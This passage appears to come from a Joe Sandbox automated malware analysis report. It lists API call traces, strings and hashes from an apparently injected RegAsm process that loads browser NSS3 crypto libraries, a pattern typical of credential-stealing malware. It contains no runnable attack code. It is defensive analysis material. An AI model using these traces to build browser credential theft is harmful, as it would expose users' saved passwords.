                                                                                • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?), ref: 6C916FC5
                                                                                • PK11_GetInternalKeySlot.NSS3 ref: 6C916FF4
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.2650604432.000000006C851000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C850000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_6c850000_RegAsm.jbxd
                                                                                Similarity
                                                                                • API ID: free$strcmp$strncmp$FlagL_strncasecmp$Strip$InternalK11_ParameterSecureSkipSlot
                                                                                • String ID:
                                                                                • API String ID: 1304971872-0
                                                                                • Opcode ID: 5eebbda156581c1abe18d49f17e2ae13e257a258f14a77f668166ce4a484276a
                                                                                • Instruction ID: a3fb8c28840267bfc74294ebbde1a1ae054173da359c5fbb81b61e94d6e92e41
                                                                                • Opcode Fuzzy Hash: 5eebbda156581c1abe18d49f17e2ae13e257a258f14a77f668166ce4a484276a
                                                                                • Instruction Fuzzy Hash: 64B172B5E0921D9FEF00CBA5D946B9E7BB9EF09348F140124E815E7E00E735E925CBA1
                                                                                APIs
                                                                                • TlsGetValue.KERNEL32 ref: 6C914C4C
                                                                                • EnterCriticalSection.KERNEL32(?), ref: 6C914C60
                                                                                • PR_Unlock.NSS3(?,?,?,?,?,?,?,?,?,?,?), ref: 6C914CA1
                                                                                • TlsGetValue.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 6C914CBE
                                                                                • EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 6C914CD2
                                                                                • realloc.MOZGLUE(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C914D3A
                                                                                • PORT_Alloc_Util.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C914D4F
                                                                                • PR_Unlock.NSS3(?,?,?,?,?,?,?,?,?,?,?), ref: 6C914DB7
                                                                                  • Part of subcall function 6C97DD70: TlsGetValue.KERNEL32 ref: 6C97DD8C
                                                                                  • Part of subcall function 6C97DD70: LeaveCriticalSection.KERNEL32(00000000), ref: 6C97DDB4
                                                                                  • Part of subcall function 6C8C07A0: TlsGetValue.KERNEL32(00000000,?,?,?,?,6C85204A), ref: 6C8C07AD
                                                                                  • Part of subcall function 6C8C07A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6C85204A), ref: 6C8C07CD
                                                                                  • Part of subcall function 6C8C07A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6C85204A), ref: 6C8C07D6
                                                                                  • Part of subcall function 6C8C07A0: calloc.MOZGLUE(00000001,00000144,?,?,?,?,6C85204A), ref: 6C8C07E4
                                                                                  • Part of subcall function 6C8C07A0: TlsSetValue.KERNEL32(00000000,?,6C85204A), ref: 6C8C0864
                                                                                  • Part of subcall function 6C8C07A0: calloc.MOZGLUE(00000001,0000002C), ref: 6C8C0880
                                                                                  • Part of subcall function 6C8C07A0: TlsSetValue.KERNEL32(00000000,?,?,6C85204A), ref: 6C8C08CB
                                                                                  • Part of subcall function 6C8C07A0: TlsGetValue.KERNEL32(?,?,6C85204A), ref: 6C8C08D7
                                                                                  • Part of subcall function 6C8C07A0: TlsGetValue.KERNEL32(?,?,6C85204A), ref: 6C8C08FB
                                                                                • TlsGetValue.KERNEL32 ref: 6C914DD7
                                                                                • EnterCriticalSection.KERNEL32(?), ref: 6C914DEC
                                                                                • PR_Unlock.NSS3(?), ref: 6C914E1B
                                                                                • PR_SetError.NSS3(00000000,00000000), ref: 6C914E2F
                                                                                • PR_SetError.NSS3(FFFFE013,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C914E5A
                                                                                • PR_SetError.NSS3(00000000,00000000), ref: 6C914E71
                                                                                • free.MOZGLUE(00000000), ref: 6C914E7A
                                                                                • PR_Unlock.NSS3(?), ref: 6C914EA2
                                                                                • TlsGetValue.KERNEL32 ref: 6C914EC1
                                                                                • EnterCriticalSection.KERNEL32(?), ref: 6C914ED6
                                                                                • PR_Unlock.NSS3(?), ref: 6C914F01
                                                                                • free.MOZGLUE(00000000), ref: 6C914F2A
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.2650604432.000000006C851000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C850000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_6c850000_RegAsm.jbxd
                                                                                Similarity
                                                                                • API ID: Value$CriticalSectionUnlock$Enter$Error$callocfree$Alloc_LeaveUtilrealloc
                                                                                • String ID:
                                                                                • API String ID: 759471828-0
                                                                                • Opcode ID: 9bf6343da8e5f3c285d4bb07b7c3cea9d9543a61934f56e1598f0437e510aae0
                                                                                • Instruction ID: 33e5f914997f13a89f4f1b947534dff511a239e7fc9ad4eafead0270e20ee22e
                                                                                • Opcode Fuzzy Hash: 9bf6343da8e5f3c285d4bb07b7c3cea9d9543a61934f56e1598f0437e510aae0
                                                                                • Instruction Fuzzy Hash: A0B1F075A0420A9FEF10DF68D846AAA77B8BF0A31CF048124ED1597F00E739E965CF91
                                                                                APIs
                                                                                • PR_GetEnvSecure.NSS3(SSLKEYLOGFILE,?,6C966BF7), ref: 6C966EB6
                                                                                  • Part of subcall function 6C8C1240: TlsGetValue.KERNEL32(00000040,?,6C8C116C,NSPR_LOG_MODULES), ref: 6C8C1267
                                                                                  • Part of subcall function 6C8C1240: EnterCriticalSection.KERNEL32(?,?,?,6C8C116C,NSPR_LOG_MODULES), ref: 6C8C127C
                                                                                  • Part of subcall function 6C8C1240: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(?,?,?,?,6C8C116C,NSPR_LOG_MODULES), ref: 6C8C1291
                                                                                  • Part of subcall function 6C8C1240: PR_Unlock.NSS3(?,?,?,?,6C8C116C,NSPR_LOG_MODULES), ref: 6C8C12A0
                                                                                • fopen.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,6CA0FC0A,6C966BF7), ref: 6C966ECD
                                                                                • ftell.API-MS-WIN-CRT-STDIO-L1-1-0(00000000), ref: 6C966EE0
                                                                                • fwrite.API-MS-WIN-CRT-STDIO-L1-1-0(# SSL/TLS secrets log file, generated by NSS,0000002D,00000001), ref: 6C966EFC
                                                                                • PR_NewLock.NSS3 ref: 6C966F04
                                                                                • fclose.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 6C966F18
                                                                                • PR_GetEnvSecure.NSS3(SSLFORCELOCKS,6C966BF7), ref: 6C966F30
                                                                                • PR_GetEnvSecure.NSS3(NSS_SSL_ENABLE_RENEGOTIATION,?,6C966BF7), ref: 6C966F54
                                                                                • PR_GetEnvSecure.NSS3(NSS_SSL_REQUIRE_SAFE_NEGOTIATION,?,?,6C966BF7), ref: 6C966FE0
                                                                                • PR_GetEnvSecure.NSS3(NSS_SSL_CBC_RANDOM_IV,?,?,?,6C966BF7), ref: 6C966FFD
                                                                                Strings
                                                                                • NSS_SSL_REQUIRE_SAFE_NEGOTIATION, xrefs: 6C966FDB
                                                                                • NSS_SSL_ENABLE_RENEGOTIATION, xrefs: 6C966F4F
                                                                                • SSLKEYLOGFILE, xrefs: 6C966EB1
                                                                                • # SSL/TLS secrets log file, generated by NSS, xrefs: 6C966EF7
                                                                                • NSS_SSL_CBC_RANDOM_IV, xrefs: 6C966FF8
                                                                                • SSLFORCELOCKS, xrefs: 6C966F2B
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.2650604432.000000006C851000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C850000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_6c850000_RegAsm.jbxd
                                                                                Similarity
                                                                                • API ID: Secure$CriticalEnterLockSectionUnlockValuefclosefopenftellfwritegetenv
                                                                                • String ID: # SSL/TLS secrets log file, generated by NSS$NSS_SSL_CBC_RANDOM_IV$NSS_SSL_ENABLE_RENEGOTIATION$NSS_SSL_REQUIRE_SAFE_NEGOTIATION$SSLFORCELOCKS$SSLKEYLOGFILE
                                                                                • API String ID: 412497378-2352201381
                                                                                APIs
                                                                                • PR_LogPrint.NSS3(C_Digest), ref: 6C906D86
                                                                                • PL_strncpyz.NSS3(?, hSession = 0x%x,00000050), ref: 6C906DB4
                                                                                • PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6C906DC3
                                                                                  • Part of subcall function 6C9ED930: PL_strncpyz.NSS3(?,?,?), ref: 6C9ED963
                                                                                • PR_LogPrint.NSS3(?,00000000), ref: 6C906DD9
                                                                                • PR_LogPrint.NSS3( pData = 0x%p,?), ref: 6C906DFA
                                                                                • PR_LogPrint.NSS3( ulDataLen = %d,?), ref: 6C906E13
                                                                                • PR_LogPrint.NSS3( pDigest = 0x%p,?), ref: 6C906E2C
                                                                                • PR_LogPrint.NSS3( pulDigestLen = 0x%p,?), ref: 6C906E47
                                                                                • PR_LogPrint.NSS3( *pulDigestLen = 0x%x,?), ref: 6C906EB9
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.2650604432.000000006C851000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C850000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_6c850000_RegAsm.jbxd
                                                                                Similarity
                                                                                • API ID: Print$L_strncpyz$L_strcatn
                                                                                • String ID: *pulDigestLen = 0x%x$ hSession = 0x%x$ pData = 0x%p$ pDigest = 0x%p$ pulDigestLen = 0x%p$ ulDataLen = %d$ (CK_INVALID_HANDLE)$C_Digest
                                                                                • API String ID: 1003633598-2270781106
                                                                                APIs
                                                                                • _EH_prolog.MSVCRT ref: 00411CDD
                                                                                • StrCmpCA.SHLWAPI(00000000,block,00000000,?,?,00416CD7), ref: 00411CFF
                                                                                • ExitProcess.KERNEL32 ref: 00411D0A
                                                                                • strtok_s.MSVCRT ref: 00411D21
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.2640792644.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.2640792644.0000000000434000.00000040.00000400.00020000.00000000.sdmp
                                                                                • Associated: 00000002.00000002.2640792644.0000000000438000.00000040.00000400.00020000.00000000.sdmp
                                                                                • Associated: 00000002.00000002.2640792644.000000000043C000.00000040.00000400.00020000.00000000.sdmp
                                                                                • Associated: 00000002.00000002.2640792644.000000000052B000.00000040.00000400.00020000.00000000.sdmp
                                                                                • Associated: 00000002.00000002.2640792644.000000000052E000.00000040.00000400.00020000.00000000.sdmp
                                                                                • Associated: 00000002.00000002.2640792644.0000000000534000.00000040.00000400.00020000.00000000.sdmp
                                                                                • Associated: 00000002.00000002.2640792644.0000000000553000.00000040.00000400.00020000.00000000.sdmp
                                                                                • Associated: 00000002.00000002.2640792644.0000000000572000.00000040.00000400.00020000.00000000.sdmp
                                                                                • Associated: 00000002.00000002.2640792644.000000000060B000.00000040.00000400.00020000.00000000.sdmp
                                                                                • Associated: 00000002.00000002.2640792644.000000000063F000.00000040.00000400.00020000.00000000.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: ExitH_prologProcessstrtok_s
                                                                                • String ID: block
                                                                                • API String ID: 3745986650-2199623458
                                                                                APIs
                                                                                • memchr.VCRUNTIME140(abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789-_,00000000,00000041,6C928E01,00000000,6C929060,6CA30B64), ref: 6C928E7B
                                                                                • strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?,?,6C928E01,00000000,6C929060,6CA30B64), ref: 6C928E9E
                                                                                • PORT_ArenaAlloc_Util.NSS3(6CA30B64,00000001,?,?,?,?,6C928E01,00000000,6C929060,6CA30B64), ref: 6C928EAD
                                                                                • memcpy.VCRUNTIME140(00000000,00000000,00000001,?,?,?,?,?,?,6C928E01,00000000,6C929060,6CA30B64), ref: 6C928EC3
                                                                                • strlen.API-MS-WIN-CRT-STRING-L1-1-0(5D8B5657,?,?,?,?,?,?,?,?,?,6C928E01,00000000,6C929060,6CA30B64), ref: 6C928ED8
                                                                                • PORT_ArenaAlloc_Util.NSS3(?,00000001,?,?,?,?,?,?,?,?,?,?,6C928E01,00000000,6C929060,6CA30B64), ref: 6C928EE5
                                                                                • memcpy.VCRUNTIME140(00000000,5D8B5657,00000001,?,?,?,?,?,?,?,?,?,?,?,?,6C928E01), ref: 6C928EFB
                                                                                • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(6CA30B64,6CA30B64), ref: 6C928F11
                                                                                • PORT_ArenaGrow_Util.NSS3(?,5D8B5657,643D8B08), ref: 6C928F3F
                                                                                  • Part of subcall function 6C92A110: PORT_ArenaGrow_Util.NSS3(8514C483,EB2074C0,184D8B3E,?,00000000,00000000,00000000,FFFFFFFF,?,6C92A421,00000000,00000000,6C929826), ref: 6C92A136
                                                                                • PR_SetError.NSS3(FFFFE013,00000000), ref: 6C92904A
                                                                                Strings
                                                                                • abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789-_, xrefs: 6C928E76
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.2650604432.000000006C851000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C850000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_6c850000_RegAsm.jbxd
                                                                                Similarity
                                                                                • API ID: ArenaUtil$Alloc_Grow_memcpystrlen$Errormemchrstrcmp
                                                                                • String ID: abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789-_
                                                                                • API String ID: 977052965-1032500510
                                                                                APIs
                                                                                • PR_SetError.NSS3(FFFFE005,00000000), ref: 6C8D8E5B
                                                                                • PR_SetError.NSS3(FFFFE007,00000000), ref: 6C8D8E81
                                                                                • PL_InitArenaPool.NSS3(?,security,00000800,00000008), ref: 6C8D8EED
                                                                                • SEC_QuickDERDecodeItem_Util.NSS3(?,?,6CA018D0,?), ref: 6C8D8F03
                                                                                • PR_CallOnce.NSS3(6CA32AA4,6C9312D0), ref: 6C8D8F19
                                                                                • PL_FreeArenaPool.NSS3(?), ref: 6C8D8F2B
                                                                                • PORT_ArenaAlloc_Util.NSS3(?,00000001), ref: 6C8D8F53
                                                                                • memset.VCRUNTIME140(00000000,00000000,00000001), ref: 6C8D8F65
                                                                                • PL_FinishArenaPool.NSS3(?), ref: 6C8D8FA1
                                                                                • SECITEM_DupItem_Util.NSS3(?), ref: 6C8D8FFE
                                                                                • PR_CallOnce.NSS3(6CA32AA4,6C9312D0), ref: 6C8D9012
                                                                                • PL_FreeArenaPool.NSS3(?), ref: 6C8D9024
                                                                                • PL_FinishArenaPool.NSS3(?), ref: 6C8D902C
                                                                                • PORT_DestroyCheapArena.NSS3(?), ref: 6C8D903E
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.2650604432.000000006C851000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C850000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_6c850000_RegAsm.jbxd
                                                                                Similarity
                                                                                • API ID: Arena$Pool$Util$CallErrorFinishFreeItem_Once$Alloc_CheapDecodeDestroyInitQuickmemset
                                                                                • String ID: security
                                                                                • API String ID: 3512696800-3315324353
                                                                                APIs
                                                                                • PR_LogPrint.NSS3(C_GetAttributeValue), ref: 6C904E83
                                                                                • PL_strncpyz.NSS3(?, hSession = 0x%x,00000050), ref: 6C904EB8
                                                                                • PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6C904EC7
                                                                                  • Part of subcall function 6C9ED930: PL_strncpyz.NSS3(?,?,?), ref: 6C9ED963
                                                                                • PR_LogPrint.NSS3(?,00000000), ref: 6C904EDD
                                                                                • PL_strncpyz.NSS3(?, hObject = 0x%x,00000050), ref: 6C904F0B
                                                                                • PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6C904F1A
                                                                                • PR_LogPrint.NSS3(?,00000000), ref: 6C904F30
                                                                                • PR_LogPrint.NSS3( pTemplate = 0x%p,?), ref: 6C904F4F
                                                                                • PR_LogPrint.NSS3( ulCount = %d,?), ref: 6C904F68
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.2650604432.000000006C851000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C850000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_6c850000_RegAsm.jbxd
                                                                                Similarity
                                                                                • API ID: Print$L_strncpyz$L_strcatn
                                                                                • String ID: hObject = 0x%x$ hSession = 0x%x$ pTemplate = 0x%p$ ulCount = %d$ (CK_INVALID_HANDLE)$C_GetAttributeValue
                                                                                • API String ID: 1003633598-3530272145
                                                                                APIs
                                                                                • PR_LogPrint.NSS3(C_GetObjectSize), ref: 6C904CF3
                                                                                • PL_strncpyz.NSS3(?, hSession = 0x%x,00000050), ref: 6C904D28
                                                                                • PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6C904D37
                                                                                  • Part of subcall function 6C9ED930: PL_strncpyz.NSS3(?,?,?), ref: 6C9ED963
                                                                                • PR_LogPrint.NSS3(?,00000000), ref: 6C904D4D
                                                                                • PL_strncpyz.NSS3(?, hObject = 0x%x,00000050), ref: 6C904D7B
                                                                                • PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6C904D8A
                                                                                • PR_LogPrint.NSS3(?,00000000), ref: 6C904DA0
                                                                                • PR_LogPrint.NSS3( pulSize = 0x%p,?), ref: 6C904DBC
                                                                                • PR_LogPrint.NSS3( *pulSize = 0x%x,?), ref: 6C904E20
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.2650604432.000000006C851000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C850000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_6c850000_RegAsm.jbxd
                                                                                Similarity
                                                                                • API ID: Print$L_strncpyz$L_strcatn
                                                                                • String ID: *pulSize = 0x%x$ hObject = 0x%x$ hSession = 0x%x$ pulSize = 0x%p$ (CK_INVALID_HANDLE)$C_GetObjectSize
                                                                                • API String ID: 1003633598-3553622718
                                                                                APIs
                                                                                • PR_LoadLibrary.NSS3(ws2_32.dll,?,?,?,6C99CC7B), ref: 6C99CD7A
                                                                                  • Part of subcall function 6C99CE60: PR_LoadLibraryWithFlags.NSS3(?,?,?,?,00000000,?,6C90C1A8,?), ref: 6C99CE92
                                                                                • PR_FindSymbol.NSS3(00000000,freeaddrinfo), ref: 6C99CDA5
                                                                                • PR_FindSymbol.NSS3(00000000,getnameinfo), ref: 6C99CDB8
                                                                                • PR_UnloadLibrary.NSS3(00000000), ref: 6C99CDDB
                                                                                • PR_FindSymbol.NSS3(00000000,getaddrinfo), ref: 6C99CD8E
                                                                                  • Part of subcall function 6C8C05C0: PR_EnterMonitor.NSS3 ref: 6C8C05D1
                                                                                  • Part of subcall function 6C8C05C0: PR_ExitMonitor.NSS3 ref: 6C8C05EA
                                                                                • PR_LoadLibrary.NSS3(wship6.dll), ref: 6C99CDE8
                                                                                • PR_FindSymbol.NSS3(00000000,getaddrinfo), ref: 6C99CDFF
                                                                                • PR_FindSymbol.NSS3(00000000,freeaddrinfo), ref: 6C99CE16
                                                                                • PR_FindSymbol.NSS3(00000000,getnameinfo), ref: 6C99CE29
                                                                                • PR_UnloadLibrary.NSS3(00000000), ref: 6C99CE48
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.2650604432.000000006C851000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C850000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_6c850000_RegAsm.jbxd
                                                                                Similarity
                                                                                • API ID: FindSymbol$Library$Load$MonitorUnload$EnterExitFlagsWith
                                                                                • String ID: freeaddrinfo$getaddrinfo$getnameinfo$ws2_32.dll$wship6.dll
                                                                                APIs
                                                                                • SEC_ASN1DecodeItem_Util.NSS3(?,?,6CA01DE0,?), ref: 6C936CFE
                                                                                • PR_SetError.NSS3(FFFFE005,00000000), ref: 6C936D26
                                                                                • PR_SetError.NSS3(FFFFE04F,00000000), ref: 6C936D70
                                                                                • PORT_Alloc_Util.NSS3(00000480), ref: 6C936D82
                                                                                • DER_GetInteger_Util.NSS3(?), ref: 6C936DA2
                                                                                • SECOID_GetAlgorithmTag_Util.NSS3(?), ref: 6C936DD8
                                                                                • PK11_KeyGen.NSS3(00000000,8000000B,?,00000000,00000000), ref: 6C936E60
                                                                                • PK11_CreateContextBySymKey.NSS3(00000201,00000108,?,?), ref: 6C936F19
                                                                                • PK11_DigestBegin.NSS3(00000000), ref: 6C936F2D
                                                                                • PK11_DigestOp.NSS3(?,?,00000000), ref: 6C936F7B
                                                                                • PK11_DestroyContext.NSS3(00000000,00000001), ref: 6C937011
                                                                                • PK11_FreeSymKey.NSS3(00000000), ref: 6C937033
                                                                                • free.MOZGLUE(?), ref: 6C93703F
                                                                                • PK11_DigestFinal.NSS3(?,?,?,00000400), ref: 6C937060
                                                                                • SECITEM_CompareItem_Util.NSS3(?,?), ref: 6C937087
                                                                                • PR_SetError.NSS3(FFFFE062,00000000), ref: 6C9370AF
                                                                                Similarity
                                                                                • API ID: K11_$Util$DigestError$ContextItem_$AlgorithmAlloc_BeginCompareCreateDecodeDestroyFinalFreeInteger_Tag_free
                                                                                APIs
                                                                                • TlsGetValue.KERNEL32(?,?,?,6C8DAB95,00000000,?,00000000,00000000,00000000), ref: 6C8FAF25
                                                                                • EnterCriticalSection.KERNEL32(?,?,?,?,6C8DAB95,00000000,?,00000000,00000000,00000000), ref: 6C8FAF39
                                                                                • PR_Unlock.NSS3(?,?,?,6C8DAB95,00000000,?,00000000,00000000,00000000), ref: 6C8FAF51
                                                                                • PR_SetError.NSS3(FFFFE041,00000000,?,?,?,6C8DAB95,00000000,?,00000000,00000000,00000000), ref: 6C8FAF69
                                                                                • TlsGetValue.KERNEL32 ref: 6C8FB06B
                                                                                • EnterCriticalSection.KERNEL32(?), ref: 6C8FB083
                                                                                • PR_Unlock.NSS3(?), ref: 6C8FB0A4
                                                                                • TlsGetValue.KERNEL32 ref: 6C8FB0C1
                                                                                • EnterCriticalSection.KERNEL32(00000000), ref: 6C8FB0D9
                                                                                • PR_Unlock.NSS3 ref: 6C8FB102
                                                                                • SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6C8FB151
                                                                                • SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6C8FB182
                                                                                  • Part of subcall function 6C92FAB0: free.MOZGLUE(?,-00000001,?,?,6C8CF673,00000000,00000000), ref: 6C92FAC7
                                                                                • PR_SetError.NSS3(FFFFE08A,00000000), ref: 6C8FB177
                                                                                  • Part of subcall function 6C97C2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C97C2BF
                                                                                • SECITEM_ZfreeItem_Util.NSS3(00000000,00000001,?,?,6C8DAB95,00000000,?,00000000,00000000,00000000), ref: 6C8FB1A2
                                                                                • PR_GetCurrentThread.NSS3(?,?,?,?,6C8DAB95,00000000,?,00000000,00000000,00000000), ref: 6C8FB1AA
                                                                                • PR_SetError.NSS3(FFFFE018,00000000,?,?,?,?,6C8DAB95,00000000,?,00000000,00000000,00000000), ref: 6C8FB1C2
                                                                                  • Part of subcall function 6C921560: TlsGetValue.KERNEL32(00000000,?,6C8F0844,?), ref: 6C92157A
                                                                                  • Part of subcall function 6C921560: EnterCriticalSection.KERNEL32(?,?,?,6C8F0844,?), ref: 6C92158F
                                                                                  • Part of subcall function 6C921560: PR_Unlock.NSS3(?,?,?,?,6C8F0844,?), ref: 6C9215B2
                                                                                Similarity
                                                                                • API ID: Value$CriticalEnterSectionUnlock$ErrorItem_UtilZfree$CurrentThreadfree
                                                                                APIs
                                                                                • SECOID_GetAlgorithmTag_Util.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C94ADB1
                                                                                  • Part of subcall function 6C92BE30: SECOID_FindOID_Util.NSS3(6C8E311B,00000000,?,6C8E311B,?), ref: 6C92BE44
                                                                                • PL_InitArenaPool.NSS3(?,security,00000800,00000008), ref: 6C94ADF4
                                                                                • SEC_QuickDERDecodeItem_Util.NSS3(?,?,?,?), ref: 6C94AE08
                                                                                  • Part of subcall function 6C92B030: PR_SetError.NSS3(FFFFE005,00000000,?,?,6CA018D0,?), ref: 6C92B095
                                                                                • SECOID_GetAlgorithmTag_Util.NSS3(?), ref: 6C94AE25
                                                                                • PL_FreeArenaPool.NSS3 ref: 6C94AE63
                                                                                • PR_CallOnce.NSS3(6CA32AA4,6C9312D0), ref: 6C94AE4D
                                                                                  • Part of subcall function 6C854C70: TlsGetValue.KERNEL32(?,?,?,6C853921,6CA314E4,6C99CC70), ref: 6C854C97
                                                                                  • Part of subcall function 6C854C70: EnterCriticalSection.KERNEL32(?,?,?,?,6C853921,6CA314E4,6C99CC70), ref: 6C854CB0
                                                                                  • Part of subcall function 6C854C70: PR_Unlock.NSS3(?,?,?,?,?,6C853921,6CA314E4,6C99CC70), ref: 6C854CC9
                                                                                • SECKEY_DestroyPublicKey.NSS3(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C94AE93
                                                                                • PR_CallOnce.NSS3(6CA32AA4,6C9312D0), ref: 6C94AECC
                                                                                • PL_FreeArenaPool.NSS3 ref: 6C94AEDE
                                                                                • PL_FinishArenaPool.NSS3 ref: 6C94AEE6
                                                                                • PR_SetError.NSS3(FFFFD004,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C94AEF5
                                                                                • PL_FinishArenaPool.NSS3 ref: 6C94AF16
                                                                                Similarity
                                                                                • API ID: ArenaPool$Util$AlgorithmCallErrorFinishFreeOnceTag_$CriticalDecodeDestroyEnterFindInitItem_PublicQuickSectionUnlockValue
                                                                                • String ID: security
                                                                                APIs
                                                                                • TlsGetValue.KERNEL32(?,?), ref: 6C8E8E22
                                                                                • EnterCriticalSection.KERNEL32(?), ref: 6C8E8E36
                                                                                • memset.VCRUNTIME140(?,00000000,?), ref: 6C8E8E4F
                                                                                • calloc.MOZGLUE(00000001,?,?,?), ref: 6C8E8E78
                                                                                • memcpy.VCRUNTIME140(-00000008,?,?), ref: 6C8E8E9B
                                                                                • memset.VCRUNTIME140(00000000,00000000,?), ref: 6C8E8EAC
                                                                                • PL_ArenaAllocate.NSS3(?,?), ref: 6C8E8EDE
                                                                                • memcpy.VCRUNTIME140(-00000008,?,?), ref: 6C8E8EF0
                                                                                • memset.VCRUNTIME140(?,00000000,?), ref: 6C8E8F00
                                                                                • free.MOZGLUE(?), ref: 6C8E8F0E
                                                                                • memcpy.VCRUNTIME140(?,?,?), ref: 6C8E8F39
                                                                                • memset.VCRUNTIME140(?,00000000,?), ref: 6C8E8F4A
                                                                                • memset.VCRUNTIME140(?,00000000,?), ref: 6C8E8F5B
                                                                                • PR_Unlock.NSS3(?), ref: 6C8E8F72
                                                                                • PR_Unlock.NSS3(?), ref: 6C8E8F82
                                                                                Similarity
                                                                                • API ID: memset$memcpy$Unlock$AllocateArenaCriticalEnterSectionValuecallocfree
                                                                                APIs
                                                                                • PK11_DoesMechanism.NSS3(?,00000132), ref: 6C90CE9E
                                                                                • PK11_DoesMechanism.NSS3(?,00000321), ref: 6C90CEBB
                                                                                • PK11_DoesMechanism.NSS3(?,00001081), ref: 6C90CED8
                                                                                • PK11_DoesMechanism.NSS3(?,00000551), ref: 6C90CEF5
                                                                                • PK11_DoesMechanism.NSS3(?,00000651), ref: 6C90CF12
                                                                                • PK11_DoesMechanism.NSS3(?,00000321), ref: 6C90CF2F
                                                                                • PK11_DoesMechanism.NSS3(?,00000121), ref: 6C90CF4C
                                                                                • PK11_DoesMechanism.NSS3(?,00000400), ref: 6C90CF69
                                                                                • PK11_DoesMechanism.NSS3(?,00000341), ref: 6C90CF86
                                                                                • PK11_DoesMechanism.NSS3(?,00000311), ref: 6C90CFA3
                                                                                • PK11_DoesMechanism.NSS3(?,00000301), ref: 6C90CFBC
                                                                                • PK11_DoesMechanism.NSS3(?,00000331), ref: 6C90CFD5
                                                                                • PK11_DoesMechanism.NSS3(?,00000101), ref: 6C90CFEE
                                                                                • PK11_DoesMechanism.NSS3(?,00000141), ref: 6C90D007
                                                                                • PK11_DoesMechanism.NSS3(?,00001008), ref: 6C90D021
                                                                                Similarity
                                                                                • API ID: DoesK11_Mechanism
                                                                                APIs
                                                                                • PORT_Alloc_Util.NSS3(?), ref: 6C91EE0B
                                                                                  • Part of subcall function 6C930BE0: malloc.MOZGLUE(6C928D2D,?,00000000,?), ref: 6C930BF8
                                                                                  • Part of subcall function 6C930BE0: TlsGetValue.KERNEL32(6C928D2D,?,00000000,?), ref: 6C930C15
                                                                                • PR_SetError.NSS3(FFFFE013,00000000), ref: 6C91EEE1
                                                                                  • Part of subcall function 6C911D50: TlsGetValue.KERNEL32(00000000,-00000018), ref: 6C911D7E
                                                                                  • Part of subcall function 6C911D50: EnterCriticalSection.KERNEL32(?), ref: 6C911D8E
                                                                                  • Part of subcall function 6C911D50: PR_Unlock.NSS3(?), ref: 6C911DD3
                                                                                • TlsGetValue.KERNEL32 ref: 6C91EE51
